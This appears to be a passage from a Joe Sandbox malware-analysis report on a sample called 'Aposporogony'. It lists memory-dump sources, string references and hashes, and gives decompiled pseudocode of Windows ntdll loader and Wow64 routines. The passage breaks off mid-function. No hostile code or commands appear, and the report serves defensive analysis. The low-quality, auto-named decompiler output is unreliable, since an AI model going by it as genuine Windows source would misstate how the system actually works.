                                                                                                                                                                                      0x1d87c680
                                                                                                                                                                                      0x1d87c680
                                                                                                                                                                                      0x1d87c685
                                                                                                                                                                                      0x1d87c687
                                                                                                                                                                                      0x1d87c689
                                                                                                                                                                                      0x1d87c68b
                                                                                                                                                                                      0x1d87c68d
                                                                                                                                                                                      0x1d87c697
                                                                                                                                                                                      0x1d87c697
                                                                                                                                                                                      0x1d87c68d
                                                                                                                                                                                      0x1d87c69d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d87c69d
                                                                                                                                                                                      0x1d87c67d
                                                                                                                                                                                      0x1d87c650
                                                                                                                                                                                      0x1d87c650
                                                                                                                                                                                      0x1d87c653
                                                                                                                                                                                      0x1d87c653

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 1D8B80E2
                                                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 1D8B80E9
                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1D8B80F3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                                                      • Opcode ID: eaeb87c3368e6713a1692d9060bba77430c547a7c2c50410ccf8526cbbbf43c0
                                                                                                                                                                                      • Instruction ID: a33d283f78a5afd30a89c246da428716ae23c5fbfd169a114acb735887dea0ea
                                                                                                                                                                                      • Opcode Fuzzy Hash: eaeb87c3368e6713a1692d9060bba77430c547a7c2c50410ccf8526cbbbf43c0
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3419E79519310BBC711DB78CD80B6B77F8BB44794F01592EF94897262EA34E800CB93
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                      			E1D8C43D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                      				char _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				signed char _t37;
                                                                                                                                                                                      				signed int _t41;
                                                                                                                                                                                      				intOrPtr _t44;
                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                      				signed int _t60;
                                                                                                                                                                                      				signed int _t64;
                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                      				intOrPtr _t68;
                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                      				intOrPtr _t70;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t68 = _a4;
                                                                                                                                                                                      				_t54 = __edx;
                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                      				_v24 = E1D8C4B46(_t68);
                                                                                                                                                                                      				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
                                                                                                                                                                                      				_v8 =  *((intOrPtr*)(_t54 + 0x30));
                                                                                                                                                                                      				_v20 =  *((intOrPtr*)(_t54 + 0x90));
                                                                                                                                                                                      				_t37 =  *0x1d936714; // 0x0
                                                                                                                                                                                      				_v16 = _t68;
                                                                                                                                                                                      				_t69 =  *0x1d936710; // 0x0
                                                                                                                                                                                      				if((_t37 & 0x00000001) != 0) {
                                                                                                                                                                                      					if(_t69 == 0) {
                                                                                                                                                                                      						_t69 = 0;
                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t69 = _t69 ^ 0x1d936710;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t64 = _t37 & 1;
                                                                                                                                                                                      				while(_t69 != 0) {
                                                                                                                                                                                      					__eflags = E1D8C4528(_t54, _t69,  &_v24, _t69);
                                                                                                                                                                                      					if(__eflags >= 0) {
                                                                                                                                                                                      						if(__eflags <= 0) {
                                                                                                                                                                                      							L25:
                                                                                                                                                                                      							while(_t69 != 0) {
                                                                                                                                                                                      								_t41 = E1D8C4528(_t54, _t69,  &_v24, _t69);
                                                                                                                                                                                      								__eflags = _t41;
                                                                                                                                                                                      								if(_t41 != 0) {
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t66 =  *0x1d935ca0; // 0x0
                                                                                                                                                                                      								__eflags = _t66;
                                                                                                                                                                                      								if(_t66 == 0) {
                                                                                                                                                                                      									L28:
                                                                                                                                                                                      									__eflags =  *0x1d9337c0 & 0x00000005;
                                                                                                                                                                                      									_t70 =  *((intOrPtr*)(_t69 + 0x20));
                                                                                                                                                                                      									if(( *0x1d9337c0 & 0x00000005) != 0) {
                                                                                                                                                                                      										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                                                                                                      										_push( *((intOrPtr*)(_t44 + 0x2a8)));
                                                                                                                                                                                      										_push( *((intOrPtr*)(_t44 + 0x2a4)));
                                                                                                                                                                                      										_push(_a4);
                                                                                                                                                                                      										_push( *((intOrPtr*)(_t54 + 0x30)));
                                                                                                                                                                                      										_push( *((intOrPtr*)(_t54 + 0x2c)));
                                                                                                                                                                                      										_push( *((intOrPtr*)(_v28 + 0x30)));
                                                                                                                                                                                      										E1D8BE692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L27:
                                                                                                                                                                                      									return _t70;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x1d9391e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
                                                                                                                                                                                      								_t49 =  *_t66();
                                                                                                                                                                                      								__eflags = _t49;
                                                                                                                                                                                      								if(_t49 != 0) {
                                                                                                                                                                                      									goto L28;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t50 =  *(_t69 + 4);
                                                                                                                                                                                      								_t59 = _t69;
                                                                                                                                                                                      								__eflags = _t50;
                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										_t69 =  *(_t69 + 8) & 0xfffffffc;
                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                      										if(_t69 == 0) {
                                                                                                                                                                                      											goto L25;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__eflags =  *_t69 - _t59;
                                                                                                                                                                                      										if( *_t69 == _t59) {
                                                                                                                                                                                      											goto L25;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t59 = _t69;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t69 = _t50;
                                                                                                                                                                                      								_t60 =  *_t69;
                                                                                                                                                                                      								__eflags = _t60;
                                                                                                                                                                                      								if(_t60 == 0) {
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L20;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									L20:
                                                                                                                                                                                      									_t51 =  *_t60;
                                                                                                                                                                                      									_t69 = _t60;
                                                                                                                                                                                      									_t60 = _t51;
                                                                                                                                                                                      									__eflags = _t51;
                                                                                                                                                                                      								} while (_t51 != 0);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t70 = 0xffbadd11;
                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t52 =  *(_t69 + 4);
                                                                                                                                                                                      						L9:
                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                      						if(_t64 == 0) {
                                                                                                                                                                                      							L12:
                                                                                                                                                                                      							_t69 = _t52;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t52;
                                                                                                                                                                                      						if(_t52 == 0) {
                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t69 = _t69 ^ _t52;
                                                                                                                                                                                      						continue;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t52 =  *_t69;
                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L25;
                                                                                                                                                                                      			}


























                                                                                                                                                                                      0x1d8c43e2
                                                                                                                                                                                      0x1d8c43e5
                                                                                                                                                                                      0x1d8c43e7
                                                                                                                                                                                      0x1d8c43f3
                                                                                                                                                                                      0x1d8c43fa
                                                                                                                                                                                      0x1d8c4401
                                                                                                                                                                                      0x1d8c440b
                                                                                                                                                                                      0x1d8c440f
                                                                                                                                                                                      0x1d8c4414
                                                                                                                                                                                      0x1d8c4418
                                                                                                                                                                                      0x1d8c4420
                                                                                                                                                                                      0x1d8c4424
                                                                                                                                                                                      0x1d8c442e
                                                                                                                                                                                      0x1d8c442e
                                                                                                                                                                                      0x1d8c4426
                                                                                                                                                                                      0x1d8c4426
                                                                                                                                                                                      0x1d8c4426
                                                                                                                                                                                      0x1d8c4424
                                                                                                                                                                                      0x1d8c4433
                                                                                                                                                                                      0x1d8c445e
                                                                                                                                                                                      0x1d8c4443
                                                                                                                                                                                      0x1d8c4445
                                                                                                                                                                                      0x1d8c444b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c44c0
                                                                                                                                                                                      0x1d8c446a
                                                                                                                                                                                      0x1d8c446f
                                                                                                                                                                                      0x1d8c4471
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c4473
                                                                                                                                                                                      0x1d8c4479
                                                                                                                                                                                      0x1d8c447b
                                                                                                                                                                                      0x1d8c44d4
                                                                                                                                                                                      0x1d8c44d4
                                                                                                                                                                                      0x1d8c44db
                                                                                                                                                                                      0x1d8c44de
                                                                                                                                                                                      0x1d8c44e6
                                                                                                                                                                                      0x1d8c44e9
                                                                                                                                                                                      0x1d8c44ef
                                                                                                                                                                                      0x1d8c44f9
                                                                                                                                                                                      0x1d8c44fc
                                                                                                                                                                                      0x1d8c44ff
                                                                                                                                                                                      0x1d8c4502
                                                                                                                                                                                      0x1d8c451e
                                                                                                                                                                                      0x1d8c4523
                                                                                                                                                                                      0x1d8c44c9
                                                                                                                                                                                      0x1d8c44d1
                                                                                                                                                                                      0x1d8c44d1
                                                                                                                                                                                      0x1d8c4489
                                                                                                                                                                                      0x1d8c448f
                                                                                                                                                                                      0x1d8c4491
                                                                                                                                                                                      0x1d8c4493
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c4495
                                                                                                                                                                                      0x1d8c4498
                                                                                                                                                                                      0x1d8c449a
                                                                                                                                                                                      0x1d8c449c
                                                                                                                                                                                      0x1d8c44b8
                                                                                                                                                                                      0x1d8c44bb
                                                                                                                                                                                      0x1d8c44bb
                                                                                                                                                                                      0x1d8c44be
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c44b2
                                                                                                                                                                                      0x1d8c44b4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c44b6
                                                                                                                                                                                      0x1d8c44b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c44b8
                                                                                                                                                                                      0x1d8c449e
                                                                                                                                                                                      0x1d8c44a0
                                                                                                                                                                                      0x1d8c44a2
                                                                                                                                                                                      0x1d8c44a4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c44a6
                                                                                                                                                                                      0x1d8c44a6
                                                                                                                                                                                      0x1d8c44a6
                                                                                                                                                                                      0x1d8c44a8
                                                                                                                                                                                      0x1d8c44aa
                                                                                                                                                                                      0x1d8c44ac
                                                                                                                                                                                      0x1d8c44ac
                                                                                                                                                                                      0x1d8c44b0
                                                                                                                                                                                      0x1d8c44c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c44c4
                                                                                                                                                                                      0x1d8c444d
                                                                                                                                                                                      0x1d8c4450
                                                                                                                                                                                      0x1d8c4450
                                                                                                                                                                                      0x1d8c4452
                                                                                                                                                                                      0x1d8c445c
                                                                                                                                                                                      0x1d8c445c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c445c
                                                                                                                                                                                      0x1d8c4454
                                                                                                                                                                                      0x1d8c4456
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c4458
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c4458
                                                                                                                                                                                      0x1d8c4447
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8c4447
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 1D8C4519
                                                                                                                                                                                      • LdrpCheckRedirection, xrefs: 1D8C450F
                                                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D8C4508
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                                                      • Opcode ID: 91cf65907da5dffc7fa0367db59b9f0758f503a1f32d24aa5f906bf8ca8da843
                                                                                                                                                                                      • Instruction ID: b435adad2c0acfea916e96a005febb89db9941fa630f3e793946424cf9165d39
                                                                                                                                                                                      • Opcode Fuzzy Hash: 91cf65907da5dffc7fa0367db59b9f0758f503a1f32d24aa5f906bf8ca8da843
                                                                                                                                                                                      • Instruction Fuzzy Hash: C941B03660A611DFCB11CF6CC840EA677E4BF48A50B264659FC999B352D730F880CB93
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 31%
                                                                                                                                                                                      			E1D8C5B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                      				intOrPtr _v0;
                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                      				char _v12;
                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                      				intOrPtr _t36;
                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t36 = __ecx;
                                                                                                                                                                                      				_t21 = E1D85DDA0(0, 0, 0x1d811b68,  &_v8);
                                                                                                                                                                                      				if(_t21 < 0) {
                                                                                                                                                                                      					return _t21;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t43 = _v8;
                                                                                                                                                                                      				if(E1D85CF00(_t36, _t38, _v8, 0x1d811b78, 0,  &_v12, 0, _v0) >= 0) {
                                                                                                                                                                                      					_t43 = _v8;
                                                                                                                                                                                      					if(E1D85CF00(_t36, _t38, _v8, 0x1d811b70, 0,  &_v20, 0, _v0) >= 0) {
                                                                                                                                                                                      						_t43 = _v8;
                                                                                                                                                                                      						if(E1D85CF00(_t36, _t38, _v8, 0x1d811b80, 0,  &_v16, 0, _v0) >= 0) {
                                                                                                                                                                                      							_t36 = _v12;
                                                                                                                                                                                      							 *0x1d9391e0(0, L"Wow64 Emulation Layer", __edi);
                                                                                                                                                                                      							_t40 = _v12();
                                                                                                                                                                                      							if(_t40 != 0) {
                                                                                                                                                                                      								 *0x1d9391e0(_t40, 4, 0, _a12, 0, _a4, 0, _a8, 0);
                                                                                                                                                                                      								_v16();
                                                                                                                                                                                      								_t36 = _v20;
                                                                                                                                                                                      								 *0x1d9391e0(_t40);
                                                                                                                                                                                      								_v20();
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return E1D85CD80(_t36, _t43);
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x1d8c5b90
                                                                                                                                                                                      0x1d8c5ba6
                                                                                                                                                                                      0x1d8c5bad
                                                                                                                                                                                      0x1d8c5c51
                                                                                                                                                                                      0x1d8c5c51
                                                                                                                                                                                      0x1d8c5bb7
                                                                                                                                                                                      0x1d8c5bcd
                                                                                                                                                                                      0x1d8c5bd2
                                                                                                                                                                                      0x1d8c5be8
                                                                                                                                                                                      0x1d8c5bed
                                                                                                                                                                                      0x1d8c5c03
                                                                                                                                                                                      0x1d8c5c05
                                                                                                                                                                                      0x1d8c5c0f
                                                                                                                                                                                      0x1d8c5c18
                                                                                                                                                                                      0x1d8c5c1c
                                                                                                                                                                                      0x1d8c5c31
                                                                                                                                                                                      0x1d8c5c37
                                                                                                                                                                                      0x1d8c5c3a
                                                                                                                                                                                      0x1d8c5c3e
                                                                                                                                                                                      0x1d8c5c44
                                                                                                                                                                                      0x1d8c5c44
                                                                                                                                                                                      0x1d8c5c47
                                                                                                                                                                                      0x1d8c5c03
                                                                                                                                                                                      0x1d8c5be8
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                                                                      • Opcode ID: 29b64e4d42b4ee3b43a9d5c6c52fd3ab73ebf7f400ad2bd8db9e935147f908ba
                                                                                                                                                                                      • Instruction ID: f5cfa1e7c515475712002a5effecbe15224d92fed79d4828f21ba0e7a19c5324
                                                                                                                                                                                      • Opcode Fuzzy Hash: 29b64e4d42b4ee3b43a9d5c6c52fd3ab73ebf7f400ad2bd8db9e935147f908ba
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E21C0BA90411DFFEB019AA4CD88DFFBB7DEF44699B050154FA01A6211E730AE01DB62
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 21%
                                                                                                                                                                                      			E1D8BEBD0(void* __ebx, intOrPtr __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                      				signed int _t84;
                                                                                                                                                                                      				signed int _t86;
                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                      				intOrPtr _t94;
                                                                                                                                                                                      				intOrPtr _t95;
                                                                                                                                                                                      				short* _t115;
                                                                                                                                                                                      				intOrPtr* _t118;
                                                                                                                                                                                      				intOrPtr _t125;
                                                                                                                                                                                      				intOrPtr _t127;
                                                                                                                                                                                      				signed char _t128;
                                                                                                                                                                                      				intOrPtr _t132;
                                                                                                                                                                                      				intOrPtr _t135;
                                                                                                                                                                                      				intOrPtr* _t136;
                                                                                                                                                                                      				intOrPtr _t139;
                                                                                                                                                                                      				void* _t141;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t128 = __edx;
                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                      				_push(0x1d91cc00);
                                                                                                                                                                                      				E1D897BE4(__ebx, __edi, __esi);
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x40)) = __edx;
                                                                                                                                                                                      				_t135 = __ecx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x20)) = __ecx;
                                                                                                                                                                                      				_t118 = 2;
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x28)) = _t118;
                                                                                                                                                                                      				 *(_t141 - 0x68) =  *(_t141 - 0x68) & 0x00000000;
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x64)) = 0x1d8bf550;
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x60)) = E1D8BF5D0;
                                                                                                                                                                                      				if( *((intOrPtr*)(_t141 + 0xc)) >= _t118) {
                                                                                                                                                                                      					_t115 =  *((intOrPtr*)(_t141 + 8));
                                                                                                                                                                                      					 *_t115 = 0;
                                                                                                                                                                                      					_t132 = 0;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t132 = 0xc0000004;
                                                                                                                                                                                      					_t115 = 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
                                                                                                                                                                                      				if(_t135 == 0 || (_t128 & 0x00000002) != 0) {
                                                                                                                                                                                      					_t135 = _t141 - 0x68;
                                                                                                                                                                                      					 *((intOrPtr*)(_t141 - 0x20)) = _t135;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *((intOrPtr*)(_t141 - 0x4c)) = _t135;
                                                                                                                                                                                      				_t84 = 0;
                                                                                                                                                                                      				_t136 =  *((intOrPtr*)(_t141 + 0x10));
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					 *(_t141 - 0x2c) = _t84;
                                                                                                                                                                                      					if(_t84 >= 1) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *((intOrPtr*)(_t141 - 0x44)) = 0x2800;
                                                                                                                                                                                      					 *(_t141 - 0x34) = 1;
                                                                                                                                                                                      					if(_t136 != 0) {
                                                                                                                                                                                      						 *_t136 = _t118;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if((_t128 & 0x00000002) != 0) {
                                                                                                                                                                                      						_t23 = 0x1d8118a4 + _t84 * 0x14; // 0x1d8beaf0
                                                                                                                                                                                      						 *0x1d9391e0();
                                                                                                                                                                                      						 *((intOrPtr*)( *_t23))();
                                                                                                                                                                                      						_t84 =  *(_t141 - 0x2c);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *(_t141 - 4) =  *(_t141 - 4) & 0x00000000;
                                                                                                                                                                                      					_t86 = _t84 * 0x14;
                                                                                                                                                                                      					 *(_t141 - 0x38) = _t86;
                                                                                                                                                                                      					_t31 = _t86 + 0x1d811898; // 0x1d8be9f0
                                                                                                                                                                                      					_t136 =  *_t31;
                                                                                                                                                                                      					_t118 = _t136;
                                                                                                                                                                                      					 *0x1d9391e0( *((intOrPtr*)(_t141 - 0x20)), _t141 - 0x30, _t141 - 0x50);
                                                                                                                                                                                      					_t88 =  *_t136();
                                                                                                                                                                                      					if(_t88 < 0) {
                                                                                                                                                                                      						L31:
                                                                                                                                                                                      						_t132 = _t88;
                                                                                                                                                                                      						goto L32;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						if( *((intOrPtr*)(_t141 - 0x30)) != 0) {
                                                                                                                                                                                      							_push(_t141 - 0x24);
                                                                                                                                                                                      							_push( *((intOrPtr*)(_t141 - 0x30)));
                                                                                                                                                                                      							_push( *((intOrPtr*)(_t141 - 0x20)));
                                                                                                                                                                                      							_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d81189c));
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								_t118 = _t136;
                                                                                                                                                                                      								 *0x1d9391e0();
                                                                                                                                                                                      								_t88 =  *_t136();
                                                                                                                                                                                      								if(_t88 < 0) {
                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if( *((intOrPtr*)(_t141 - 0x24)) !=  *((intOrPtr*)(_t141 - 0x30))) {
                                                                                                                                                                                      									_t94 =  *((intOrPtr*)(_t141 - 0x44));
                                                                                                                                                                                      									if(_t94 != 0) {
                                                                                                                                                                                      										_t95 = _t94 - 1;
                                                                                                                                                                                      										 *((intOrPtr*)(_t141 - 0x44)) = _t95;
                                                                                                                                                                                      										 *((intOrPtr*)(_t141 - 0x5c)) = _t95;
                                                                                                                                                                                      										_t125 =  *((intOrPtr*)(_t141 - 0x28)) +  *(_t141 - 0x34) * 0x12c;
                                                                                                                                                                                      										 *((intOrPtr*)(_t141 - 0x28)) = _t125;
                                                                                                                                                                                      										 *(_t141 - 0x34) = 1;
                                                                                                                                                                                      										 *((intOrPtr*)(_t141 - 0x58)) = 1;
                                                                                                                                                                                      										if( *((intOrPtr*)(_t141 + 0xc)) >= _t125) {
                                                                                                                                                                                      											 *_t115 = 0x12c;
                                                                                                                                                                                      											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d8118a0));
                                                                                                                                                                                      											_t118 = _t136;
                                                                                                                                                                                      											 *0x1d9391e0( *((intOrPtr*)(_t141 - 0x20)), _t115 + 4,  *((intOrPtr*)(_t141 - 0x24)),  *((intOrPtr*)(_t141 - 0x50)),  *((intOrPtr*)(_t141 - 0x40)));
                                                                                                                                                                                      											_t88 =  *_t136();
                                                                                                                                                                                      											if(_t88 < 0) {
                                                                                                                                                                                      												goto L31;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t128 =  *(_t115 + 0xc);
                                                                                                                                                                                      												if(_t128 == 0) {
                                                                                                                                                                                      													 *(_t141 - 0x34) = 0;
                                                                                                                                                                                      													 *((intOrPtr*)(_t141 - 0x58)) = 0;
                                                                                                                                                                                      													goto L28;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t128 = _t128 + 0x3c;
                                                                                                                                                                                      													_t136 =  *((intOrPtr*)(_t141 - 0x20));
                                                                                                                                                                                      													_t118 = _t136;
                                                                                                                                                                                      													_t88 = E1D8BF5EC(_t118, _t128, _t141 - 0x54, 4);
                                                                                                                                                                                      													if(_t88 < 0) {
                                                                                                                                                                                      														goto L31;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														_t127 =  *(_t115 + 0xc) +  *((intOrPtr*)(_t141 - 0x54));
                                                                                                                                                                                      														 *((intOrPtr*)(_t141 - 0x48)) = _t127;
                                                                                                                                                                                      														_t128 = _t127 + 8;
                                                                                                                                                                                      														_t118 = _t136;
                                                                                                                                                                                      														_t88 = E1D8BF5EC(_t118, _t128, _t115 + 0x124, 4);
                                                                                                                                                                                      														if(_t88 < 0) {
                                                                                                                                                                                      															goto L31;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x58;
                                                                                                                                                                                      															_t118 = _t136;
                                                                                                                                                                                      															_t88 = E1D8BF5EC(_t118, _t128, _t115 + 0x120, 4);
                                                                                                                                                                                      															if(_t88 < 0) {
                                                                                                                                                                                      																goto L31;
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x34;
                                                                                                                                                                                      																_t118 = _t136;
                                                                                                                                                                                      																_t88 = E1D8BF5EC(_t118, _t128, _t115 + 0x128, 4);
                                                                                                                                                                                      																if(_t88 < 0) {
                                                                                                                                                                                      																	goto L31;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	_t115 = _t115 + 0x12c;
                                                                                                                                                                                      																	 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
                                                                                                                                                                                      																	 *_t115 = 0;
                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                      																}
                                                                                                                                                                                      															}
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t132 = 0xc0000004;
